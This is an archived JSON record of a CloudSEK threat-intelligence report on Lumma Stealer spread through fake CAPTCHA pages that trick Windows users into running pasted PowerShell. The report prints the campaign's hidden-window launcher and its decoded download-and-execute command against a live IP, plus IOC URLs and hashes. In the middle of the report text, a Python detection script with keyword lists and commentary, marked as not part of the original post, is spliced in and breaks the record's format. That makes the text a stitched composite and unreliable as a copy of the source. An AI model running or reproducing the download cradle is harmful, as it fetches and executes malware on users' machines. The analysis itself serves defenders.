{
	"id": "56e229d5-bdb0-48eb-b910-ec216c70d3a2",
	"created_at": "2026-04-06T00:18:24.410283Z",
	"updated_at": "2026-04-10T03:23:51.095012Z",
	"deleted_at": null,
	"sha1_hash": "8d36abaeb0cedddfb780c7bc16954a0a78b33f1e",
	"title": "Unmasking the Danger: Lumma Stealer Malware Exploits Fake CAPTCHA Pages",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 975911,
	"plain_text": "Unmasking the Danger: Lumma Stealer Malware Exploits Fake CAPTCHA Pages\r\nBy CloudSEK TRIAD\r\nPublished: 2025-08-21 · Archived: 2026-04-05 21:58:07 UTC\r\nMalware Intelligence\r\nThe Lumma Stealer malware is being distributed through deceptive human verification pages that trick users into running malicious PowerShell commands. This phishing campaign primarily targets Windows users and can lead to the theft of sensitive information.\r\nSeptember 19, 2024\r\n5 min\r\nhttps://www.cloudsek.com/blog/unmasking-the-danger-lumma-stealer-malware-exploits-fake-captcha-pages\r\nCategory: Adversary Intelligence\r\nIndustry: Multiple\r\nMotivation: Cyber Crime/Financial\r\nRegion: Global\r\nTLP: GREEN\r\nExecutive Summary\r\nA new and sophisticated method of distributing Lumma Stealer malware has been uncovered, targeting Windows users through deceptive human verification pages. This technique, initially discovered by Unit 42 at Palo Alto Networks, prompted further investigation into similar malicious sites.\r\nAfter our investigation, we identified more active malicious sites spreading Lumma Stealer. It is important to note that while this technique is currently being used to distribute Lumma Stealer, it could be leveraged to deliver any other malware to unsuspecting users.\r\nFlow of the Phishing Campaign and Malware Infection\r\nAnalysis and Attribution\r\nModus Operandi\r\nThreat actors create phishing sites hosted on various providers, often utilizing Content Delivery Networks (CDNs). 
These sites present users with a fake Google CAPTCHA page.\r\nUpon clicking the \"Verify\" button, users are presented with unusual instructions:\r\nOpen the Run dialog (Win+R)\r\nPress Ctrl+V\r\nHit Enter\r\nUnbeknownst to the user, clicking the button has already run a hidden JavaScript function that copies a Base64-encoded PowerShell command to the clipboard, so Ctrl+V pastes that command into the Run dialog and Enter executes it.\r\nThe PowerShell command, when executed, downloads the Lumma Stealer malware from a remote server.\r\nTechnical Analysis\r\nOur research team identified multiple domains hosting these malicious verification pages. The infection chain typically follows this pattern:\r\nUser visits the fake verification page\r\nPhishing page presenting a deceptive Google CAPTCHA verification prompt\r\nThe PowerShell script is copied to the clipboard when the user clicks the “I’m not a robot” button. Inspecting the source code of the phishing sites also reveals the command being copied.\r\nVerification steps requested by the deceptive sites\r\nOnce the user pastes the PowerShell command into the Run dialog box, it launches PowerShell in a hidden window and executes the Base64-encoded command: powershell -w hidden -eC followed by the Base64 payload.\r\nThe decoded Base64 command, iex (iwr http://165.227.121.41/a.txt -UseBasicParsing).Content, fetches the content of the a.txt file hosted on the remote server. 
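As an added example (not code from the original CloudSEK post), the Python below decodes a PowerShell -EncodedCommand argument the way PowerShell itself does (Base64 over UTF-16LE text) and flags process command lines that match the pattern described above: a hidden window, an encoded command, and a download-and-execute cradle pointing at a raw IP. The sample command lines are constructed for this example; the encoded one is built from the decoded command the post reports, and the function names are the example's own.

```python
import base64
import re

# Switches that PowerShell resolves to -EncodedCommand: any unambiguous
# prefix (-e, -en, -enc, ...) plus the explicit -ec shorthand that the
# command on this page (powershell -w hidden -eC ...) relies on.
ENCODED_SWITCHES = {'-encodedcommand'[:n] for n in range(2, 16)} | {'-ec'}
# Likewise -w, -wi, ... -windowstyle for the hidden-window switch.
WINDOW_SWITCHES = {'-windowstyle'[:n] for n in range(2, 13)}
# Download-and-execute cradle cmdlets and aliases, compared as whole words.
CRADLE_WORDS = {'iex', 'invoke-expression', 'iwr', 'invoke-webrequest',
                'irm', 'invoke-restmethod', 'downloadstring', 'downloadfile'}
# A download server addressed by raw IPv4, as in the a.txt stage above.
RAW_IP_URL = re.compile(r'https?://(?:[0-9]{1,3}[.]){3}[0-9]{1,3}')
WORD = re.compile(r'[a-z0-9-]+')


def encode_command(script):
    '''Produce the -EncodedCommand argument exactly as PowerShell expects it:
    the script as UTF-16LE, then Base64.'''
    return base64.b64encode(script.encode('utf-16-le')).decode('ascii')


def decode_command(token):
    '''Inverse of encode_command. Returns None when the token is not a valid
    Base64 blob of UTF-16LE text, so ordinary arguments are never misread.'''
    try:
        return base64.b64decode(token, validate=True).decode('utf-16-le')
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_cmdline(cmdline):
    '''Inspect one process command line (for example the CommandLine field of
    a Windows Security 4688 or Sysmon Event ID 1 record) and return the
    findings that matter for this campaign. Non-PowerShell launches yield
    no findings.'''
    findings = {'hidden_window': False, 'encoded': False, 'decoded': None,
                'download_cradle': False, 'raw_ip_url': None}
    tokens = cmdline.split()
    if not tokens or 'powershell' not in tokens[0].lower():
        return findings
    lowered = [t.lower() for t in tokens]
    for i, tok in enumerate(lowered):
        nxt = lowered[i + 1] if i + 1 < len(lowered) else ''
        if tok in WINDOW_SWITCHES and nxt.startswith('hidden'):
            findings['hidden_window'] = True
        if tok in ENCODED_SWITCHES and i + 1 < len(tokens):
            decoded = decode_command(tokens[i + 1])
            if decoded is not None:
                findings['encoded'] = True
                findings['decoded'] = decoded
    # Look for the cradle in the decoded script when there is one, otherwise
    # in the visible command line (the same lure could be sent in clear).
    script = (findings['decoded'] or cmdline).lower()
    findings['download_cradle'] = bool(CRADLE_WORDS & set(WORD.findall(script)))
    match = RAW_IP_URL.search(script)
    findings['raw_ip_url'] = match.group(0) if match else None
    return findings


def is_suspicious(cmdline):
    '''Alert rule: an encoded PowerShell command combined with at least one of
    a hidden window, a download cradle, or a raw-IP download URL.'''
    f = analyse_cmdline(cmdline)
    return f['encoded'] and (f['hidden_window'] or f['download_cradle']
                             or f['raw_ip_url'] is not None)


def triage(cmdlines):
    '''Return the command lines from a log extract that trip the rule.'''
    return [c for c in cmdlines if is_suspicious(c)]


# The command the page reports after Base64 decoding; re-encoded below so
# the sample matches what the Run dialog actually launched.
PAGE_DECODED_COMMAND = 'iex (iwr http://165.227.121.41/a.txt -UseBasicParsing).Content'

# Constructed sample command lines for this example (not from the page):
# one ClickFix-style launch and two benign administrative launches.
SAMPLE_CMDLINES = [
    'powershell.exe -NoProfile -Command Get-Date',
    'powershell -w hidden -eC ' + encode_command(PAGE_DECODED_COMMAND),
    'powershell.exe -ExecutionPolicy Bypass -File C:/scripts/backup.ps1',
]

if __name__ == '__main__':
    for line in SAMPLE_CMDLINES:
        print(is_suspicious(line), analyse_cmdline(line)['decoded'], sep='  ')
```

The decoder is the part worth keeping: the -EncodedCommand argument is Base64 of UTF-16LE text, so a plain Base64 decode shows the script interleaved with NUL bytes and substring matches on iex or iwr fail until the UTF-16LE step is applied. On a real host a launch from the Run dialog additionally has explorer.exe as the parent process, and the pasted text persists in the Explorer RunMRU key of the user's registry hive; both are useful pivots that the code above does not model.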
That content is then parsed and executed with Invoke-Expression.\r\nThe a.txt file contains additional commands to download the Lumma Stealer onto the victim's device, hosted at: https://downcheck.nyc3[.]cdn[.]digitaloceanspaces.com/dengo.zip\r\nFurther commands in a.txt to download the malicious file\r\nIf the downloaded file (dengo.zip) is extracted and executed on a Windows machine, Lumma Stealer becomes operational and establishes connections with attacker-controlled domains.\r\nNotable Observations\r\nMalicious pages were found on various platforms, including Amazon S3 buckets and CDN providers\r\nThe use of Base64 encoding and clipboard manipulation shows the attackers' efforts to evade detection\r\nThe initial executable often downloads additional components, complicating analysis and potentially allowing for modular functionality\r\nAlthough this campaign primarily distributes Lumma Stealer malware, it has the potential to deceive users into downloading various types of malicious files onto their Windows devices.\r\nRecommendations\r\nEducate employees and users about this new social engineering tactic, emphasizing the danger of copying and pasting unknown commands.\r\nImplement and maintain robust endpoint protection solutions capable of detecting and blocking PowerShell-based attacks.\r\nMonitor network traffic for suspicious connections to newly registered or uncommon domains.\r\nRegularly update and patch all systems to mitigate potential vulnerabilities exploited by the Lumma Stealer malware. Note that the infection chain described here depends on the user running the pasted command rather than on a software vulnerability, so patching limits follow-on exploitation but does not by itself stop the lure.\r\nMalicious Fake 
URLs\r\nhxxps[://]heroic-genie-2b372e[.]netlify[.]app/please-verify-z[.]html\r\nhxxps[://]fipydslaongos[.]b-cdn[.]net/please-verify-z[.]html\r\nhxxps[://]sdkjhfdskjnck[.]s3[.]amazonaws[.]com/human-verify-system[.]html\r\nhxxps[://]verifyhuman476[.]b-cdn[.]net/human-verify-system[.]html\r\nhxxps[://]pub-9c4ec7f3f95c448b85e464d2b533aac1[.]r2[.]dev/human-verify-system[.]html\r\nhxxps[://]newvideozones[.]click/veri[.]html\r\nhxxps[://]ch3[.]dlvideosfre[.]click/human-verify-system[.]html\r\nhxxps[://]ofsetvideofre[.]click\r\nType | Name | Value\r\nFile | dengo.zip | 7c348f51d383d6587e2beac5ff79bef2e66c31d7\r\nIP | Downloader Server IP | 165.227.121.41\r\nPE Exec File | tr7 | e002696bb7d57315b352844cebc031e18e89f29e\r\nPE Exec File | 2ndhsoru | 766c266506918b467bf35db701c9b0954a616b58\r\nReferences\r\n* Intelligence source and information reliability - Wikipedia\r\n# Traffic Light Protocol - Wikipedia\r\nhttps://darktrace.com/blog/the-rise-of-the-lumma-info-stealer\r\nUnit42-timely-threat-intel/2024-08-28-IOCs-for-Lumman-Stealer-from-fake-human-captcha-copy-paste-script.txt at main\r\nAppendix\r\nLumma Stealer Malware-as-a-Service Page\r\nCloudSEK TRIAD\r\nCloudSEK Threat Research and Information Analytics Division\r\nSource: https://www.cloudsek.com/blog/unmasking-the-danger-lumma-stealer-malware-exploits-fake-captcha-pages",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MITRE"
	],
	"references": [
		"https://www.cloudsek.com/blog/unmasking-the-danger-lumma-stealer-malware-exploits-fake-captcha-pages"
	],
	"report_names": [
		"unmasking-the-danger-lumma-stealer-malware-exploits-fake-captcha-pages"
	],
	"threat_actors": [
		{
			"id": "08c8f238-1df5-4e75-b4d8-276ebead502d",
			"created_at": "2023-01-06T13:46:39.344081Z",
			"updated_at": "2026-04-10T02:00:03.294222Z",
			"deleted_at": null,
			"main_name": "Copy-Paste",
			"aliases": [],
			"source_name": "MISPGALAXY:Copy-Paste",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434704,
	"ts_updated_at": 1775791431,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8d36abaeb0cedddfb780c7bc16954a0a78b33f1e.pdf",
		"text": "https://archive.orkl.eu/8d36abaeb0cedddfb780c7bc16954a0a78b33f1e.txt",
		"img": "https://archive.orkl.eu/8d36abaeb0cedddfb780c7bc16954a0a78b33f1e.jpg"
	}
}